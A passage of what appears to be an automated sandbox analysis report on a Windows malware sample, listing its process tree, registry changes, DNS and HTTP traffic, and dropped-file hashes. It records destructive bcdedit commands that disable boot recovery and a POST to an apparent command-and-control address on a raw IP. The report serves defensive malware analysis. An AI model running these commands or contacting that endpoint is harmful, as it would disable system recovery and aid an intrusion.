7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe Token: SeTakeOwnershipPrivilege 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 372 wrote to memory of 1420 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe 92 PID 372 wrote to memory of 1420 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe 92 PID 372 wrote to memory of 2992 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe 94 PID 372 wrote to memory of 2992 372 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe 94 PID 1420 wrote to memory of 116 1420 cmd.exe 98 PID 1420 wrote to memory of 116 1420 cmd.exe 98 PID 2992 wrote to memory of 2252 2992 cmd.exe 99 PID 2992 wrote to memory of 2252 2992 cmd.exe 99 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" 7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe"C:\Users\Admin\AppData\Local\Temp\7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe"1⤵
- Checks computer location settings
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:372 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no2⤵
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
PID:2252
-
-
Network
-
Remote address:8.8.8.8:53Request232.168.11.51.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request232.168.11.51.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request232.168.11.51.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request22.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request175.178.17.96.in-addr.arpaIN PTRResponse175.178.17.96.in-addr.arpaIN PTRa96-17-178-175deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request241.154.82.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestapi.ipify.orgIN AResponseapi.ipify.orgIN A104.26.12.205api.ipify.orgIN A104.26.13.205api.ipify.orgIN A172.67.74.152
-
Remote address:104.26.12.205:80RequestGET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: api.ipify.org
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 12
Connection: keep-alive
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 867521af0d0145a0-LHR
-
Remote address:8.8.8.8:53Request205.12.26.104.in-addr.arpaIN PTRResponse
-
POSThttp://91.215.85.142/QWEwqdsvsf/ap.php7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exeRemote address:91.215.85.142:80RequestPOST /QWEwqdsvsf/ap.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 91.215.85.142
Content-Length: 159
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 20 Mar 2024 10:48:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
-
Remote address:8.8.8.8:53Request142.85.215.91.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request41.110.16.96.in-addr.arpaIN PTRResponse41.110.16.96.in-addr.arpaIN PTRa96-16-110-41deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request55.36.223.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request104.219.191.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request149.220.183.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request157.123.68.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request15.164.165.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request196.249.167.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request18.134.221.88.in-addr.arpaIN PTRResponse18.134.221.88.in-addr.arpaIN PTRa88-221-134-18deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request240.221.184.93.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request48.229.111.52.in-addr.arpaIN PTRResponse
-
104.26.12.205:80http://api.ipify.org/http7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe465 B 400 B 7 4
HTTP Request
GET http://api.ipify.org/HTTP Response
200 -
91.215.85.142:80http://91.215.85.142/QWEwqdsvsf/ap.phphttp7f23383db868ce94c91cc1b6041f6b997fb604d77b2959bb4945632eaf4ee05a.exe611 B 437 B 6 5
HTTP Request
POST http://91.215.85.142/QWEwqdsvsf/ap.phpHTTP Response
200 -
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
216 B 158 B 3 1
DNS Request
232.168.11.51.in-addr.arpa
DNS Request
232.168.11.51.in-addr.arpa
DNS Request
232.168.11.51.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
22.160.190.20.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
175.178.17.96.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
241.154.82.20.in-addr.arpa
-
59 B 107 B 1 1
DNS Request
api.ipify.org
DNS Response
104.26.12.205104.26.13.205172.67.74.152
-
72 B 134 B 1 1
DNS Request
205.12.26.104.in-addr.arpa
-
72 B 132 B 1 1
DNS Request
142.85.215.91.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
41.110.16.96.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
55.36.223.20.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
104.219.191.52.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
149.220.183.52.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
157.123.68.40.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
15.164.165.52.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
196.249.167.52.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
18.134.221.88.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
240.221.184.93.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
48.229.111.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12B
MD58cf4dec152a9d79a3d62202b886eda9b
SHA10c1b3d3d02c0b655aa3526a58486b84872f18cc2
SHA256c30e56c9c8fe30ffa4a4ff712cf2fa1808ee82ca258cd4c8ebefcc82250b6c01
SHA512a5a65f0604f8553d0be07bd5214db52d3f167e7511d29cb64e3fa9d8c510cc79976ff2a5acb9b8c09b666f306ac8e4ad389f9a2de3ca46d57b1e91060a4c50fd
-
Filesize
1KB
MD5b3b6ebd10052a8937b317f1fed584070
SHA199aaf96b8e574a3c47913fbcc8a54ceede573fbe
SHA2564a36643303ba57d64011193d291e4c7828ae4e55de77ca0f2c74e998ca964fe0
SHA512222f5498a5604975dc42d3e506796f065ec9c397f250c1a61e793e01c63ff777c51ee7c6ecf6c5702b7fc3bdca6bffec20027881e57a9e7a30298a8d34760012